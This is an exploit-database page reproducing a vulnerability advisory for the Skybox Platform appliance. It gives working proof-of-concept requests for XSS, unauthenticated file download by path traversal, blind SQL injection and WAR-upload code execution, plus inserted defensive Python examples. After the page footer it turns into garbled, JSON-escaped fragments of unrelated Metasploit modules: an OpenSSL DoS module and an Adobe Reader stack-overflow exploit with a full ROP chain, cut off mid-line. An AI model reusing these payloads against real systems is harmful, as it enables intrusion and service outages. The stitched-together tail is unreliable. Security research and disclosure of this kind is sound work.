ID 1337DAY-ID-24701 Type zdt Reporter SEC Consult Modified 2015-12-11T00:00:00
Description
Exploit for hardware platform in category web applications
Skybox Platform 7.0.611 - Multiple Vulnerabilities
product: Skybox Platform
vulnerable version: <=7.0.611
fixed version: 7.5.401
homepage: www.skyboxsecurity.com/products/appliance
=======================================================================
Vendor description:
-------------------
"Skybox Security provides cutting-edge risk analytics for enterprise security
management. Our solutions give you complete network visibility, help you
eliminate attack vectors, and optimize your security management processes.
Protect the network and the business."
Source: http://www.skyboxsecurity.com/
Business recommendation:
------------------------
Attackers are able to perform Cross-Site Scripting and SQL Injection attacks
against the Skybox platform. Furthermore, it is possible for
unauthenticated attackers to download arbitrary files and execute arbitrary
code.
SEC Consult recommends that the vendor conduct a comprehensive security
analysis, based on security source code reviews, in order to identify all
remaining vulnerabilities in the Skybox platform and increase the security
of its customers.
Vulnerability overview/description:
-----------------------------------
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
2) Multiple Stored Cross-Site Scripting Vulnerabilities
3) Arbitrary File Download and Directory Traversal Vulnerability
4) Blind SQL Injection Vulnerability
5) Remote Unauthenticated Code Execution
Proof of concept:
-----------------
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
Multiple scripts are prone to reflected Cross-Site Scripting attacks.
The following example demonstrates this issue with the service
VersionRepositoryWebService: the HTML payload is injected into the xmlns:ns1
namespace declaration of the checkVersion request and is reflected in the
response.
POST /skyboxview/webservice/services/VersionRepositoryWebService HTTP/1.0
Content-type: text/plain
User-Agent: Axis/1.4
Host: localhost:8282
SOAPAction: ""
Content-Length: 863

<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <soapenv:Body>
    <ns1:checkVersion soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
        xmlns:ns1="http://com/skybox/view/webservice/versionrepositoryc4f85">&lt;a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>9884933253b">
      <components soapenc:arrayType="soapenc:string[1]" xsi:type="soapenc:Array"
          xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
        <components xsi:type="soapenc:string">Application</components>
      </components>
      <os xsi:type="soapenc:string"
          xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">windows-64</os>
      <currentVersion xsi:type="soapenc:string"
          xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">7.0.601</currentVersion>
    </ns1:checkVersion>
  </soapenv:Body>
</soapenv:Envelope>
Other scripts and parameters, such as the status parameter of the login script
(located at https://localhost:444/login.html), are affected as well. The
following request demonstrates this issue:
https://localhost:444/login.html?status=%27%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
2) Multiple Stored Cross-Site Scripting Vulnerabilities
Multiple fields of the Skybox Change Manager, which can be accessed at
https://localhost:8443/skyboxview/, are prone to stored Cross-Site Scripting
attacks. For example, when creating a new ticket, the title field can be used
to insert JavaScript code that is stored with the ticket and executed in the
browser of any user who views it. The following GWT-RPC request to the server
demonstrates the issue:
Request:
POST /skyboxview/webskybox/tickets HTTP/1.1
Host: localhost:8443
[...]

7|0|18|https://localhost:8443/skyboxview/webskybox/|272....5E|com.skybox.view.gwt.client.service.TicketsService|createAccessChangeTicket|com.skybox.view.transfer.netmodel.tickets.AccessChangeTicketData/1874789321|com.skybox.view.transfer.modelview.ChangeRequestGraph/1577593632|com.skybox.view.transfer.netmodel.phases.BasePhaseOperation/3921542662|java.util.Collection|com.skybox.view.transfer.netmodel.PhaseDefinitionId/3246549697|java.lang.String/2004016611|com.skybox.view.transfer.properties.PropertyBag/343216801|com.skybox.view.transfer.netmodel.TicketWorkflowId/3953158119|com.skybox.view.transfer.netmodel.ConfigurationItemId/1448062761|com.skybox.view.transfer.netmodel.tickets.ChangeRequestRiskEnum/852682809||skyboxview|test"><img src=yy onerror=alert(document.cookie) >|java.util.ArrayList/41
Other fields, like "Comments" and "Description", are affected as well.
3) Arbitrary File Download and Directory Traversal Vulnerability
Skybox Change Manager allows attachments to be uploaded to and downloaded from
tickets. The download functionality can be abused to retrieve arbitrary files
from the appliance: the tempFileName parameter is used to build the file path
without any traversal check, while tempShortFileName is set to a dummy value
here. No authentication is required to exploit this vulnerability. The
following request, taken against a Windows installation, demonstrates the
issue:

POST /skyboxview/webskybox/attachmentdownload HTTP/1.1
Host: localhost:8443

tempShortFileName=aaaaaa&tempFileName=../../../../../../../../../../../windows/win.ini
The script /skyboxview/webskybox/filedownload is also affected by the same
vulnerability.
Note: The upload functionality can also be used to upload files without
authentication.
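As an added illustration (not part of the SEC Consult advisory and not Skybox code), the following Python shows the defect class behind this finding next to the check that closes it: a naive join of the user-controlled tempFileName onto the attachment directory, beside a hardened resolver that accepts only a bare file name and then verifies the resolved path still lies inside the directory. The attachment directory used here is a placeholder; the advisory does not name the real one.

```python
import os

# Placeholder for the appliance's attachment store; the advisory does not
# name the real directory, so this path is an assumption of the example.
ATTACHMENT_DIR = "/opt/skyboxview/data/attachments"


def vulnerable_attachment_path(base_dir: str, temp_file_name: str) -> str:
    """The flawed pattern behind the finding: the user-supplied tempFileName
    is joined to the base directory and normalised, so every '../' walks one
    level up and the result can be any file the service account can read."""
    return os.path.normpath(os.path.join(base_dir, temp_file_name))


def safe_attachment_path(base_dir: str, temp_file_name: str) -> str:
    """Hardened resolver with two independent controls:
    1. accept a bare file name only (no directory part, no '.' or '..');
    2. resolve symlinks and confirm the result is still inside base_dir.
    Raises ValueError on anything that fails either control."""
    if temp_file_name in ("", ".", "..") or os.path.basename(temp_file_name) != temp_file_name:
        raise ValueError(f"rejected attachment name: {temp_file_name!r}")
    if "\\" in temp_file_name:  # os.path ignores backslashes on POSIX; a Windows host would not
        raise ValueError(f"rejected attachment name: {temp_file_name!r}")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, temp_file_name))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"attachment resolves outside {base}: {candidate}")
    return candidate


def is_safe_attachment_name(base_dir: str, temp_file_name: str) -> bool:
    """Boolean form of safe_attachment_path, convenient for triaging logged
    tempFileName values after the fact."""
    try:
        safe_attachment_path(base_dir, temp_file_name)
        return True
    except ValueError:
        return False


def escapes_base(base_dir: str, temp_file_name: str) -> bool:
    """True when the naive join would leave base_dir, i.e. the kind of value
    the advisory's request carries."""
    base = os.path.normpath(base_dir)
    resolved = vulnerable_attachment_path(base_dir, temp_file_name)
    return os.path.commonpath([base, resolved]) != base


if __name__ == "__main__":
    for name in ("report.pdf", "../../../../../../../../../../../windows/win.ini", "/etc/passwd"):
        print(f"{name!r}: naive -> {vulnerable_attachment_path(ATTACHMENT_DIR, name)}, "
              f"accepted by hardened resolver -> {is_safe_attachment_name(ATTACHMENT_DIR, name)}")
```

The containment check after realpath() matters even with the name filter in place: it also catches a symlink planted inside the attachment store by the unauthenticated upload the note above mentions.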
4) Blind SQL Injection Vulnerability
SQL can be injected through the username parameter of the getUserLockInSeconds
operation of the service VersionWebService. The following request demonstrates
this issue with a simple sleep statement: a vulnerable server delays its
response by about 20 seconds, and that delay, rather than any response content,
is the only signal. The sleep() call used here is MySQL syntax.
POST https://localhost:8443/skyboxview/webservice/services/VersionWebService HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 619
Host: localhost:8443
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:ver="http://com/skybox/view/webservice/version">
  <soapenv:Header/>
  <soapenv:Body>
    <ver:getUserLockInSeconds soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <username xsi:type="soapenc:string"
          xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">admin'+(select * from (select(sleep(20)))a)+'</username>
    </ver:getUserLockInSeconds>
  </soapenv:Body>
</soapenv:Envelope>
No authentication is required to exploit this vulnerability.
5) Remote Unauthenticated Code Execution
It is possible to upload WAR files, containing for example JSP files, which
are automatically deployed by the JBoss instance of the Skybox appliance. This
way an attacker can upload a JSP shell and execute arbitrary commands with the
privileges of the user the web server runs as (by default skyboxview).
The following request to the Skyboxview software update service (located at
https://localhost:9443) uploads a WAR file. The patchName parameter is not
checked for directory traversal, so the file is written to
/opt/skyboxview/thirdparty/jboss/server/web/deploy, where JBoss automatically
extracts and deploys it under
/opt/skyboxview/thirdparty/jboss/server/web/work/jboss.web/localhost.
POST /skyboxview-softwareupdate/services/CollectorSoftwareUpdate HTTP/1.1
Accept-Encoding: gzip,deflate
SOAPAction: ""
Content-Type: multipart/related; type="text/xml"; start="<rootpart@soapui.org>"; boundary="----=_Part_1_1636307031.1418103287783"
MIME-Version: 1.0
User-Agent: Jakarta Commons-HttpClient/3.1
Host: localhost:9443
Content-Length: 1944

------=_Part_1_1636307031.1418103287783
Content-Type: text/xml; charset=UTF-8
Content-Transfer-Encoding: 8bit
Content-ID: <rootpart@soapui.org>

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:sof="http://com/skybox/view/agent/webservice/softwareupdate">
  <soapenv:Header/>
  <soapenv:Body>
    <sof:uploadPatch soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <patchName xsi:type="soapenc:string"
          xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">../../thirdparty/jboss/server/web/deploy/helloworld2.war</patchName>
      <patchData href="cid:helloworld.war"/>
    </sof:uploadPatch>
  </soapenv:Body>
</soapenv:Envelope>
------=_Part_1_1636307031.1418103287783
Content-Type: application/octet-stream; name=helloworld.war
Content-Transfer-Encoding: binary
Content-ID: <helloworld.war>
Content-Disposition: attachment; name="helloworld.war"; filename="helloworld.war"

[binary]
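For responders, an added example that is not Skybox's own tooling and not part of the advisory: a baseline comparison of the JBoss deploy directory named above. Because JBoss hot-deploys whatever lands in that directory, an unexpected WAR such as helloworld2.war is the durable artefact of this attack, and a manifest taken from a known-good appliance makes it stand out. The manifest format and the sample deployment names below are constructed for the example.

```python
import hashlib
import os
from typing import Dict, List

# Directories named in the advisory. The deploy directory is what JBoss
# watches; the work directory is where the WAR is exploded after deployment.
DEPLOY_DIR = "/opt/skyboxview/thirdparty/jboss/server/web/deploy"
WORK_DIR = "/opt/skyboxview/thirdparty/jboss/server/web/work/jboss.web/localhost"


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(listing: Dict[str, bytes]) -> Dict[str, str]:
    """name -> sha256 for every deployable, taken on a known-good appliance.
    Persist this (e.g. as JSON) off-box; a manifest stored next to the
    deployables can be edited by whoever dropped the WAR."""
    return {name: sha256(data) for name, data in listing.items()}


def unexpected_deployments(listing: Dict[str, bytes], baseline: Dict[str, str]) -> List[str]:
    """Deployables absent from, or differing from, the baseline. A WAR written
    via the uploadPatch traversal appears as 'new'; a backdoored stock WAR as
    'modified'; a removed one as 'missing'."""
    findings = []
    for name, data in sorted(listing.items()):
        if name not in baseline:
            findings.append(f"new: {name}")
        elif baseline[name] != sha256(data):
            findings.append(f"modified: {name}")
    for name in sorted(set(baseline) - set(listing)):
        findings.append(f"missing: {name}")
    return findings


def read_dir(path: str) -> Dict[str, bytes]:
    """Regular files directly under `path`. Exploded (directory) deployments
    are skipped here; hash their contents separately if the appliance has
    any, since a dropped JSP can live there without a WAR ever existing."""
    listing = {}
    for entry in os.scandir(path):
        if entry.is_file(follow_symlinks=False):
            with open(entry.path, "rb") as fh:
                listing[entry.name] = fh.read()
    return listing


if __name__ == "__main__":
    # On a live appliance: build the baseline once, then diff against it.
    if os.path.isdir(DEPLOY_DIR):
        current = read_dir(DEPLOY_DIR)
        for line in unexpected_deployments(current, build_baseline({})):
            print(line)  # with an empty baseline every deployable is listed as new
```

Pair this with a timeline of the work directory named above: the extraction timestamp there tells you when the WAR was first served, which is the earliest moment a JSP shell could have been used.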
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the Skybox platform
version 7.0.611, which was the most recent version at the time of discovery.
Vendor contact timeline:
------------------------
Communication with the vendor was handled by SEC Consult's client.
Solution:
---------
According to the release-notes, the issues have been fixed in the following
versions (reference number "19184"):
7.5.401: Reflected Cross-site scripting vulnerabilities
7.5.201: Remote Code Execution, SQL Injection, Arbitrary File Download and
Directory Traversal
Users of Skybox are advised to upgrade to version 7.5.401 or higher.
# 0day.today [2018-03-28] #
\"\\x00\\x08\"\t\t\t\t# Cypher Suites Length: 6\n p1 << \"\\xc0\\x13\"\t\t\t\t# - ECDHE-RSA-AES128-SHA\n p1 << \"\\x00\\x39\"\t\t\t\t# - DHE-RSA-AES256-SHA\n p1 << \"\\x00\\x35\"\t\t\t\t# - AES256-SHA\n p1 << \"\\x00\\xff\"\t\t\t\t# - EMPTY_RENEGOTIATION_INFO_SCSV\n p1 << \"\\x01\"\t\t\t\t# Compression Methods Length: 1\n p1 << \"\\x00\"\t\t\t\t# - NULL-Compression\n p1 << \"\\x00\\x49\"\t\t\t\t# Extensions Length: 73\n p1 << \"\\x00\\x0b\"\t\t\t\t# - Extension: ec_point_formats\n p1 << \"\\x00\\x04\"\t\t\t\t# Length: 4\n p1 << \"\\x03\"\t\t\t\t# EC Points Format Length: 3\n p1 << \"\\x00\"\t\t\t\t# - uncompressed\n p1 << \"\\x01\"\t\t\t\t# - ansiX962_compressed_prime\n p1 << \"\\x02\"\t\t\t\t# - ansiX962_compressed_char2\n p1 << \"\\x00\\x0a\"\t\t\t\t# - Extension: elliptic_curves\n p1 << \"\\x00\\x34\"\t\t\t\t# Length: 52\n p1 << \"\\x00\\x32\"\t\t\t\t# Elliptic Curves Length: 50\n # 25 Elliptic curves:\n p1 << \"\\x00\\x0e\\x00\\x0d\\x00\\x19\\x00\\x0b\\x00\\x0c\\x00\\x18\\x00\\x09\\x00\\x0a\"\n p1 << \"\\x00\\x16\\x00\\x17\\x00\\x08\\x00\\x06\\x00\\x07\\x00\\x14\\x00\\x15\\x00\\x04\"\n p1 << \"\\x00\\x05\\x00\\x12\\x00\\x13\\x00\\x01\\x00\\x02\\x00\\x03\\x00\\x0f\\x00\\x10\"\n p1 << \"\\x00\\x11\"\n\n p1 << \"\\x00\\x23\"\t\t\t\t# - Extension: SessionTicket TLS\n p1 << \"\\x00\\x00\"\t\t\t\t# Length: 0\n p1 << \"\\x00\\x0f\"\t\t\t\t# - Extension: Heartbeat\n p1 << \"\\x00\\x01\"\t\t\t\t# Length: 1\n p1 << \"\\x01\"\t\t\t\t# Peer allowed to send requests\n\n\n # Change Cipher Spec Message\n p2_cssm = \"\\x14\"\t\t\t\t# Content Type: Change Cipher Spec\n p2_cssm << \"\\x03\\x02\"\t\t\t# Version: TLS 1.1\n p2_cssm << \"\\x00\\x01\"\t\t\t# Length: 1\n p2_cssm << \"\\x01\"\t\t\t\t# Change Cipher Spec Message\n\n\n # Encrypted Handshake Message\n p2_ehm = \"\\x16\"\t\t\t\t# Content Type: Handshake\n p2_ehm << \"\\x03\\x02\"\t\t\t# Version: TLS 1.1\n p2_ehm << \"\\x00\\x40\"\t\t\t# Length: 64\n p2_ehm << (\"A\" * 64)\t\t\t# Encrypted Message\n\n\n # Client Key 
Exchange, Change Cipher Spec, Encrypted Handshake\n # AES256-SHA\n p2_aes_sha = \"\\x16\"\t\t\t# Content Type: Handshake\n p2_aes_sha << \"\\x03\\x02\"\t\t\t# Version: TLS 1.1\n p2_aes_sha << \"\\x01\\x06\"\t\t\t# Length: 262\n p2_aes_sha << \"\\x10\"\t\t\t# Handshake Type: Client Key Exchange\n p2_aes_sha << \"\\x00\\x01\\x02\"\t\t# Length: 258\n p2_aes_sha << \"\\x01\\x00\"\t\t\t# Encrypted PreMaster Length: 256\n p2_aes_sha << (\"\\x00\" * 256)\t\t# Encrypted PresMaster (irrelevant)\n p2_aes_sha << p2_cssm \t\t\t# Change Cipher Spec Message\n p2_aes_sha << p2_ehm\t\t\t# Encrypted Handshake Message\n\n\n # DHE-RSA-AES256-SHA\n p2_dhe = \"\\x16\"\t\t\t\t# Content Type: Handshake\n p2_dhe << \"\\x03\\x02\"\t\t\t# Version: TLS 1.1\n p2_dhe << \"\\x00\\x46\"\t\t\t# Length: 70\n p2_dhe << \"\\x10\"\t\t\t\t# Handshake Type: Client Key Exchange\n p2_dhe << \"\\x00\\x00\\x42\"\t\t\t# Length: 66\n p2_dhe << \"\\x00\\x40\"\t\t\t# DH Pubkey Length: 64\n p2_dhe << (\"A\" * 64)\t\t\t# DH Pubkey\n p2_dhe << p2_cssm\t\t\t\t# Change Cipher Spec Message\n p2_dhe << p2_ehm\t\t\t\t# Encrypted Handshake Message\n\n\n # ECDHE-RSA-AES128-SHA\n p2_ecdhe = \"\\x16\"\t\t\t\t# Content Type: Handshake\n p2_ecdhe << \"\\x03\\x02\"\t\t\t# Version: TLS 1.1\n p2_ecdhe << \"\\x00\\x46\"\t\t\t# Length: 70\n p2_ecdhe << \"\\x10\"\t\t\t\t# Handshake Type: Client Key Exchange\n p2_ecdhe << \"\\x00\\x00\\x42\"\t\t\t# Length: 66\n p2_ecdhe << \"\\x41\"\t\t\t\t# EC DH Pubkey Length: 65\n # EC DH Pubkey:\n p2_ecdhe << \"\\x04\\x2f\\x22\\xf4\\x06\\x3f\\xa1\\xf7\\x3d\\xb6\\x55\\xbc\\x68\\x65\\x57\\xd8\"\n p2_ecdhe << \"\\x03\\xe5\\xaa\\x36\\xeb\\x0f\\x52\\x5a\\xaf\\xd0\\x9f\\xf8\\xc7\\xfe\\x09\\x69\"\n p2_ecdhe << \"\\x5b\\x38\\x95\\x58\\xb6\\x0d\\x27\\x53\\xe9\\x63\\xcb\\x96\\xb3\\x54\\x47\\xa6\"\n p2_ecdhe << \"\\xb2\\xe6\\x8b\\x2a\\xd9\\x03\\xb4\\x85\\x46\\xd9\\x1c\\x5f\\xd1\\xf7\\x7b\\x73\"\n p2_ecdhe << \"\\x40\"\n p2_ecdhe << p2_cssm\t\t\t\t# Change Cipher Spec Message\n p2_ecdhe << p2_ehm\t\t\t\t# 
Encrypted Handshake Message\n\n\n maxtries = datastore['MAX_TRIES']\n\n success = false\n\n for i in 0..maxtries\n print_status(\"Try \\##{i}\")\n\n connect\n\n sock.put(p1)\n resp = sock.get_once\n\n cs = get_cipher_suite(resp)\n\n if cs == 0xc013 # ECDHE-RSA-AES128-SHA\n p2 = p2_ecdhe\n elsif cs == 0x0039 # DHE-RSA-AES256-SHA\n p2 = p2_dhe\n elsif cs == 0x0035 # AES256-SHA\n p2 = p2_aes_sha\n else\n print_error(\"No common ciphers!\")\n return\n end\n\n sock.put(p2)\n\n alert = nil\n\n begin\n alert = sock.get_once(-1, 2)\n rescue EOFError\n print_good(\"DoS successful. process on #{rhost} did not respond.\")\n success = true\n break\n end\n\n disconnect\n\n end\n\n if success == false\n print_error(\"DoS unsuccessful.\")\n end\n end\n\n def get_cipher_suite(resp)\n offset = 0\n\n while offset < resp.length\n type = (resp[offset, 1]).unpack(\"C\")[0]\n\n if not type == 22 # Handshake\n return nil\n end\n\n len = (resp[offset+3, 2]).unpack(\"n\")[0]\n hstype = (resp[offset+5, 1]).unpack(\"C\")[0]\n\n if hstype == 2 # Server Hello\n return (resp[offset+44, 2]).unpack(\"n\")[0]\n end\n\n offset += len\n end\n\n end\nend\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/ssl/openssl_aesni.rb"}, {"lastseen": "2019-12-06T16:46:19", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. 
Prior versions are assumed to be vulnerable as well.\n", "modified": "2017-07-24T13:26:21", "published": "2010-09-09T23:23:40", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_COOLTYPE_SING", "href": "", "type": "metasploit", "title": "Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table\n handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are\n assumed to be vulnerable as well.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # 0day found in the wild\n 'sn0wfl0w', # initial analysis, also @vicheck on twitter\n 'jduck' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2010-2883' ],\n [ 'OSVDB', '67849'],\n [ 'URL', 'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html' ],\n [ 'URL', 'http://www.adobe.com/support/security/advisories/apsa10-02.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'HTTP::compression' => 'gzip',\n 'HTTP::chunked' => true,\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested OK via Adobe Reader 9.3.4 on Windows XP SP3 -jjd\n # Tested OK via Adobe Reader 9.3.4 on Windows 7 -jjd\n # Tested OK via Adobe Reader 9.3 on XP and 7 -todb\n [ 'Automatic', { }],\n ],\n 'DisclosureDate' => 'Sep 07 2010',\n 
'DefaultTarget' => 0))\n end\n\n def exploit\n # NOTE: The 0day used Vera.ttf (785d2fd45984c6548763ae6702d83e20)\n path = File.join( Msf::Config.data_directory, \"exploits\", \"cve-2010-2883.ttf\" )\n fd = File.open( path, \"rb\" )\n @ttf_data = fd.read(fd.stat.size)\n fd.close\n\n super\n end\n\n\n def on_request_uri(cli, request)\n print_user_agent(cli, request)\n\n print_status(\"Sending crafted PDF\")\n\n ttf_data = make_ttf()\n\n js_data = make_js(regenerate_payload(cli).encoded)\n\n # Create the pdf\n pdf = make_pdf(ttf_data, js_data)\n\n send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\n\n # Handle the payload\n handler(cli)\n end\n\n def print_user_agent(cli, req)\n return unless cli && cli.peerhost\n return unless req && req.headers\n return unless ua = req.headers[\"User-Agent\"]\n print_status \"Request from browser: #{ua}\"\n end\n\n def make_ttf\n\n # load the static ttf file\n ttf_data = @ttf_data.dup\n\n # Build the SING table\n sing = ''\n sing << [\n 0, 1, # tableVersionMajor, tableVersionMinor (0.1)\n 0xe01, # glyphletVersion\n 0x100, # embeddingInfo\n 0, # mainGID\n 0, # unitsPerEm\n 0, # vertAdvance\n 0x3a00 # vertOrigin\n ].pack('vvvvvvvv')\n # uniqueName\n # \"The uniqueName string must be a string of at most 27 7-bit ASCII characters\"\n #sing << \"A\" * (0x254 - sing.length)\n sing << rand_text(0x254 - sing.length)\n\n # 0xffffffff gets written here @ 0x7001400 (in BIB.dll)\n sing[0x140, 4] = [0x4a8a08e2 - 0x1c].pack('V')\n\n # This becomes our new EIP (puts esp to stack buffer)\n ret = 0x4a80cb38 # add ebp, 0x794 / leave / ret\n sing[0x208, 4] = [ret].pack('V')\n\n # This becomes the new eip after the first return\n ret = 0x4a82a714\n sing[0x18, 4] = [ret].pack('V')\n\n # This becomes the new esp after the first return\n esp = 0x0c0c0c0c\n sing[0x1c, 4] = [esp].pack('V')\n\n # Without the following, sub_801ba57 returns 0.\n sing[0x24c, 4] = [0x6c].pack('V')\n\n ttf_data[0xec, 4] = \"SING\"\n 
ttf_data[0x11c, sing.length] = sing\n\n ttf_data\n end\n\n def make_js(encoded_payload)\n\n # The following executes a ret2lib using icucnv36.dll\n # The effect is to bypass DEP and execute the shellcode in an indirect way\n stack_data = [\n 0x41414141, # unused\n 0x4a8063a5, # pop ecx / ret\n 0x4a8a0000, # becomes ecx\n\n 0x4a802196, # mov [ecx],eax / ret # save whatever eax starts as\n\n 0x4a801f90, # pop eax / ret\n 0x4a84903c, # becomes eax (import for CreateFileA)\n\n # -- call CreateFileA\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0x4a8522c8, # first arg to CreateFileA (lpFileName / pointer to \"iso88591\")\n 0x10000000, # second arg - dwDesiredAccess\n 0x00000000, # third arg - dwShareMode\n 0x00000000, # fourth arg - lpSecurityAttributes\n 0x00000002, # fifth arg - dwCreationDisposition\n 0x00000102, # sixth arg - dwFlagsAndAttributes\n 0x00000000, # seventh arg - hTemplateFile\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000008, # becomes ebx - offset to modify\n\n #\n # This points at a neat-o block of code that ... 
TBD\n #\n # and [esp+ebx*2],edi\n # jne check_slash\n # ret_one:\n # mov al,1\n # ret\n # check_slash:\n # cmp al,0x2f\n # je ret_one\n # cmp al,0x41\n # jl check_lower\n # cmp al,0x5a\n # jle check_ptr\n # check_lower:\n # cmp al,0x61\n # jl ret_zero\n # cmp al,0x7a\n # jg ret_zero\n # cmp [ecx+1],0x3a\n # je ret_one\n # ret_zero:\n # xor al,al\n # ret\n #\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849038, # becomes eax (import for CreateFileMappingA)\n\n # -- call CreateFileMappingA\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0xffffffff, # arguments to CreateFileMappingA, hFile\n 0x00000000, # lpAttributes\n 0x00000040, # flProtect\n 0x00000000, # dwMaximumSizeHigh\n 0x00010000, # dwMaximumSizeLow\n 0x00000000, # lpName\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000008, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849030, # becomes eax (import for MapViewOfFile\n\n # -- call MapViewOfFile\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0xffffffff, # args to MapViewOfFile - hFileMappingObject\n 0x00000022, # dwDesiredAccess\n 0x00000000, # dwFileOffsetHigh\n 0x00000000, # dwFileOffsetLow\n 0x00010000, # dwNumberOfBytesToMap\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a8a0004, # becomes ecx - writable pointer\n\n 0x4a802196, # mov [ecx],eax / ret - save map base addr\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000030, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a8a0004, # becomes eax - saved file mapping ptr\n\n 0x4a80a7d8, # mov eax,[eax] / ret - load saved mapping ptr\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 
0x00000020, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a80aedc, # lea edx,[esp+0xc] / push edx / push eax / push [esp+0xc] / push [0x4a8a093c] / call ecx / add esp, 0x10 / ret\n\n 0x4a801f90, # pop eax / ret\n 0x00000034, # becomes eax\n\n 0x4a80d585, # add eax,edx / ret\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x0000000a, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849170, # becomes eax (import for memcpy)\n\n # -- call memcpy\n 0x4a80b692, # jmp [eax]\n\n 0xffffffff, # this stuff gets overwritten by the block at 0x4a80aedc, becomes ret from memcpy\n 0xffffffff, # becomes first arg to memcpy (dst)\n 0xffffffff, # becomes second arg to memcpy (src)\n 0x00001000, # becomes third arg to memcpy (length)\n #0x0000258b, # ??\n #0x4d4d4a8a, # ??\n ].pack('V*')\n\n var_unescape = rand_text_alpha(rand(100) + 1)\n var_shellcode = rand_text_alpha(rand(100) + 1)\n\n var_start = rand_text_alpha(rand(100) + 1)\n\n var_s = 0x10000\n var_c = rand_text_alpha(rand(100) + 1)\n var_b = rand_text_alpha(rand(100) + 1)\n var_d = rand_text_alpha(rand(100) + 1)\n var_3 = rand_text_alpha(rand(100) + 1)\n var_i = rand_text_alpha(rand(100) + 1)\n var_4 = rand_text_alpha(rand(100) + 1)\n\n payload_buf = 